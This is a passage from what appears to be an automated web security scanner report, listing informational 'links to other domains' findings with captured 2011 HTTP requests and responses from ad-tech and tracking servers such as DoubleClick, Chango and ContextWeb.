document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20111002201501&cmxid=2101.020017861901058368xmc" style="display: none" height="1" width="1" border="0" />');var ord=Math.random()*10000000000000000;document.write("<img src='http://p.opt.fimserve.com/bht/?px=3140&v=1&rnd=" + ord + "' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://ad.xtendmedia.com/pixel?id=983035&t=2' width='1' height='1' />");document.write('<img src="http://ad.yieldmanager.com/pixel?id=979001&t=2" width="1" height="1"/>');var ord=Math.random()*10000000000000000;document.write("<img src='http://pixel.rubiconproject.com/tap.php?v=5467' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://tag.admeld.com/pixel?admeld_adprovider_id=5&_segment=93' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTEzODQmdGw9NDMyMDA' width='1' height='1' />");var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
19.99. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=24040&sz=160x600&wr=j&t=j&u=http%3A%2F%2Fdm.travelocity.com%2Fhtml.ng%2Fadsize%3D160x600%26site%3Dtravelocity%26cobrand%3DTRAVELOCITY%26locale%3Den%26pagepos%3D2%26area%3Dhotel%26dest%3DBOS%26paxa%3D0%26paxs%3D0%26paxc%3D0%26random%3D771875%26tile%3D128609801075344%26section%3Dresults&r=http%3A%2F%2Ftravel.travelocity.com%2Fhotel%2FHotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617&rnd=776731 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=720dd60e62eaaf2f7ea1bac32416

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=7225bf6549db812c27087ae2f025; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:15:09 GMT
Content-Length: 2104

document.write('<div style="z-index:10; position:relative; width:160px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://view.atdmt.com/DWC/jview/352348531/direct/01?click=http:/
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=178619&bid=1058366&lid=24040" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
document.write('<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20111002201509&cmxid=2101.020017861901058366xmc" style="display: none" height="1" width="1" border="0" />');var ord=Math.random()*10000000000000000;document.write("<img src='http://p.opt.fimserve.com/bht/?px=3140&v=1&rnd=" + ord + "' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://ad.xtendmedia.com/pixel?id=983035&t=2' width='1' height='1' />");document.write('<img src="http://ad.yieldmanager.com/pixel?id=979001&t=2" width="1" height="1"/>');var ord=Math.random()*10000000000000000;document.write("<img src='http://pixel.rubiconproject.com/tap.php?v=5467' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://tag.admeld.com/pixel?admeld_adprovider_id=5&_segment=93' width='1' height='1' />");var ord=Math.random()*10000000000000000;document.write("<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTEzODQmdGw9NDMyMDA' width='1' height='1' />");var _comscore = _comscore || []; _comscore.push({ c1: "8", c2: "2101" ,c3: "1234567891234567891" }); (function() { var s = document.createElement("script"), el = document.getElementsByTagNam
...[SNIP]...
19.100. http://as.chango.com/links/adunit/1.31759988192e+12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...
</script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
<IMG SRC="http://ad.doubleclick.net/ad/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
19.101. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bh/rtset?do=add&pid=531292&ev=OO-00000000000000000&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DOO-00000000000000000 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr

Response

HTTP/1.1 302 Moved Temporarily
Server: GlassFish v3
CW-Server: cw-app605
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr99f871d6edb7aea19dd0bf8; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:50:17 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|530739.99f871d6ab8391d98e386b3c.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|531292.OO-00000000000000000.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 01-Oct-2012 23:50:17 GMT; Path=/
Location: http://m.xp1.ru4.com/meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 239
Date: Sun, 02 Oct 2011 23:50:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=OO-00000000000000000">here</a>
...[SNIP]...
19.102. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99016880 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cmegroup.com/advance/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 03 Oct 2011 00:26:45 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15=&amp;cv=2.0&amp;cj=1">here</a>
...[SNIP]...
19.103. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99013083 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://int.teracent.net/tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=_52rCMf9pAIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 270
Date: Mon, 03 Oct 2011 00:10:30 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.googleadservices.com/pagead/conversion/1030885431/?label=_52rCMf9pAIQt6DI6wM&amp;amp;guid=ON&amp;amp;script=0">here</a>
...[SNIP]...
19.104. http://cdn.flashtalking.com/container/4649/4649.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.flashtalking.com
Path:   /container/4649/4649.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /container/4649/4649.js?SamleHomepage1&cachebuster=132287.43779473007 HTTP/1.1
Host: cdn.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 200 OK
x-amz-id-2: DWxYBZV6nCQWk1mmwgC2TE5BkqhTA4++brgXVv65iCjXzftjlkk4MOBRhuYCvMwT
x-amz-request-id: 24969F7CF586B88A
Last-Modified: Fri, 16 Sep 2011 16:20:52 GMT
ETag: "24e353f86a77738ea2c3a2c05a6a90ea"
Content-Type: text/javascript
Content-Length: 858
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:58:08 GMT
Connection: close

var ftR=Math.floor(Math.random()*100000);
var ftE=new Array("http://servedby.flashtalking.com/spot/217;4649;542/?Sample_Homepage_1");
for(var ftP=0;ftP<ftE.length;ftP++){
ftOP(ftE[f
...[SNIP]...
</div>');
document.write('<img src="http://www.wtp101.com/pixel?id=3105" width="1" height="1" border="0" style="display:none;"/>');
document.write('<img src="http://a.tribalfusion.com/i.cid?c=395973&ev=1&page=Samplehomepage" width="1" height="1" border="0" style = "display:none;">');
19.105. http://clk.specificclick.net/click/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.specificclick.net
Path:   /click/v=5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01 HTTP/1.1
Host: clk.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 211
Date: Mon, 03 Oct 2011 00:26:42 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01">here</a>.<p>
</body>
...[SNIP]...
19.106. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=105311;u13=114243;u14=203448;u15=1401516;u16=14%2F10%2F11-16%2F10%2F11;u18=2;ord=11678075?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:19 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 382
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423484%26id%3D1423481%26id%3D1423480%26id%3D1423483%26id%3D1423482%26t%3D2">here</A>
...[SNIP]...
19.107. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_gid=CAESENMwAp9y838qvs4mxLt4ILs&google_cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:27:30 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 337
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&amp;google_gid=CAESENMwAp9y838qvs4mxLt4ILs&amp;google_cver=1">here</A>
...[SNIP]...
19.108. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?google_nid=pubmatic&google_cm&google_sc HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTIxNzcmdGw9MTI5NjAw&google_error=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:52:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 302
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTIxNzcmdGw9MTI5NjAw&amp;google_error=1">here</A>
...[SNIP]...
19.109. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423476%26id%3D1423478%26id%3D1423475%26id%3D1423477%26id%3D1423479%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=prope724;cat=prope480;u1=US;u2=Boston;u3=Boston%20Omni%20Parker%20House%20Hotel;u4=Merchant;u5=109368;u6=289.00;u11=4;u15=1401516;u16=04%2F10%2F11-07%2F10%2F11;ord=71228260?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423476%26id%3D1423478%26id%3D1423475%26id%3D1423477%26id%3D1423479%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:28:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 382
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1423476%26id%3D1423478%26id%3D1423475%26id%3D1423477%26id%3D1423479%26t%3D2">here</A>
...[SNIP]...
19.110. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=chango&partnerId=&referrerURL=&token=b6ae888c-d95b-11e0-b096-0025900e0834 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
